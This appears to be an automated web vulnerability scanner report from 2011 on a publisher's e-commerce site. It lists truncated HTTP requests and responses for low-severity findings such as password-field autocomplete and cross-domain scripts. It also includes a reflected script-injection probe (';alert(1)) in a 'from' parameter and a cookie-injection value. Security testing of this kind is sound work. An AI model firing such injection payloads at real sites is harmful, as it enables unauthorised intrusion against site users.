HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:07:08 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17075 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( 'randomhouse1e67a';alert(1)/ if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://ecommerce |
Path: | /cart.do |
GET /cart.do?from=randomhouse HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:22 GMT Server: Apache Set-Cookie: JSESSIONID=99AF3E637 Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT Content-Type: text/html;charset=ISO Content-Length: 19400 <!-- shoppingCart.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://ecommerce |
Path: | /account.do |
GET /account.do?from Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:29 GMT Server: Apache Set-Cookie: JSESSIONID=30BCBB974 Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16859 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:18:06 GMT Server: Apache Set-Cookie: JSESSIONID=A35B965C0 Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16763 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /cart.do |
GET /cart.do?from=%27%22--%3E Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:47:26 GMT Server: Apache Set-Cookie: rhecommerce='"--></style> Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT Content-Type: text/html;charset=ISO Content-Length: 19741 <!-- shoppingCart.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //email-password.do |
GET //email-password.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:11 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 18043 <!-- updateEmailPassword.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns=" ...[SNIP]... <!-- End SiteCatalyst code version: H.17. --> <form action="email-password <input type="hidden" name="redirect" value="" /> ...[SNIP]... <div style="margin-left:183px <input type="password" name="password" value="" maxlength="20" size="40" style="width: 160px"> </div> ...[SNIP]... <div style="margin-left:183px <input type="password" name="confirmPassword" value="" maxlength="20" size="40" style="width: 160px"> </div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /account.do |
GET /account.do?from Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:29 GMT Server: Apache Set-Cookie: JSESSIONID=30BCBB974 Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16859 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- End SiteCatalyst code version: H.17. --> <form action="sign-in-submit.do <div id="ecom_page_contents"> ...[SNIP]... <span class="ecom_login_field"> <input type="password" name="password" value="" size="30" /> </span> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account-submit.do |
GET /create-account-submit.do HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:47:05 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 20778 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... </script> <form action="create-account <input type="hidden" name="shippingAddress" value="useBillingAddress" /> ...[SNIP]... <div class="account_data_value <input type="password" name="password" value=""> </div> ...[SNIP]... <div class="account_data_value <input type="password" name="confirmPassword" value=""> (min 6 characters) </div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account.do |
GET /create-account.do HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:19:46 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 20193 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... </script> <form action="create-account <input type="hidden" name="shippingAddress" value="useBillingAddress" /> ...[SNIP]... <div class="account_data_value <input type="password" name="password" value=""> </div> ...[SNIP]... <div class="account_data_value <input type="password" name="confirmPassword" value=""> (min 6 characters) </div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in-submit.do |
GET /sign-in-submit.do HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:26:47 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 16981 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- End SiteCatalyst code version: H.17. --> <form action="sign-in-submit.do <div id="ecom_page_contents"> ...[SNIP]... <span class="ecom_login_field"> <input type="password" name="password" value="" size="30" /> </span> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:44 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16851 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- End SiteCatalyst code version: H.17. --> <form action="sign-in-submit.do <div id="ecom_page_contents"> ...[SNIP]... <span class="ecom_login_field"> <input type="password" name="password" value="" size="30" /> </span> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /cart.do |
GET /cart.do?from=%27%22--%3E Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:47:26 GMT Server: Apache Set-Cookie: rhecommerce='"--></style> Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT Content-Type: text/html;charset=ISO Content-Length: 19741 <!-- shoppingCart.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /cart.do |
GET /cart.do?from=randomhouse HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:22 GMT Server: Apache Set-Cookie: JSESSIONID=99AF3E637 Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT Content-Type: text/html;charset=ISO Content-Length: 19400 <!-- shoppingCart.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... <noscript><a href="http://www.omniture src="http://randomhouse height="1" width="1" border="0" alt="" /> ...[SNIP]... <div style="text-align:right <a href="https://seal ...[SNIP]... <div class="rhbw_rfloat"> <a href="http://www ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve <noscript> <img src="//secure.quantserve </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //create-address.do |
GET //create-address.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:15 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 24044 <!-- createAddress.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:/ ...[SNIP]... <div style="text-align:right <a href="https://seal ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve <noscript> <img src="//secure.quantserve </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //email-password.do |
GET //email-password.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:11 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 18043 <!-- updateEmailPassword.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns=" ...[SNIP]... <div style="text-align:right <a href="https://seal ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve <noscript> <img src="//secure.quantserve </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //select-address.do |
GET //select-address.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:15 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16341 <!-- selectAddress.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:/ ...[SNIP]... <div style="text-align:right <a href="https://seal ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve <noscript> <img src="//secure.quantserve </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //view-orders.do |
GET //view-orders.do?from=' HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:12 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 14600 <!-- orderHistory.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:// ...[SNIP]... <div style="text-align:right <a href="https://seal ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve <noscript> <img src="//secure.quantserve </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /account.do |
GET /account.do?from Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:29 GMT Server: Apache Set-Cookie: JSESSIONID=30BCBB974 Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16859 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <div style="text-align:right <a href="https://seal ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve <noscript> <img src="//secure.quantserve </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account.do |
GET /create-account.do?from Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:11 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 20226 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... <div style="text-align:right <a href="https://seal ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve <noscript> <img src="//secure.quantserve </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /password.do |
GET /password.do?from= HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:19:40 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 11309 <!-- forgottenPassword.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="htt ...[SNIP]... <div style="text-align:right <a href="https://seal ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve <noscript> <img src="//secure.quantserve </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:44 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16851 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <div style="text-align:right <a href="https://seal ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve <noscript> <img src="//secure.quantserve </noscript> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /cart.do |
GET /cart.do?from=randomhouse HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:22 GMT Server: Apache Set-Cookie: JSESSIONID=99AF3E637 Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT Content-Type: text/html;charset=ISO Content-Length: 19400 <!-- shoppingCart.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //account.do |
GET //account.do HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:49:24 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17091 <!-- account.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //create-address.do |
GET //create-address.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:15 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 24044 <!-- createAddress.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:/ ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //email-password.do |
GET //email-password.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:11 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 18043 <!-- updateEmailPassword.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns=" ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //select-address.do |
GET //select-address.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:15 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16341 <!-- selectAddress.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:/ ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //view-orders.do |
GET //view-orders.do?from=' HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:12 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 14600 <!-- orderHistory.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:// ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /account.do |
GET /account.do?from Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:29 GMT Server: Apache Set-Cookie: JSESSIONID=30BCBB974 Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16859 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account-submit.do |
GET /create-account-submit.do HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:47:05 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 20778 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account.do |
GET /create-account.do HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
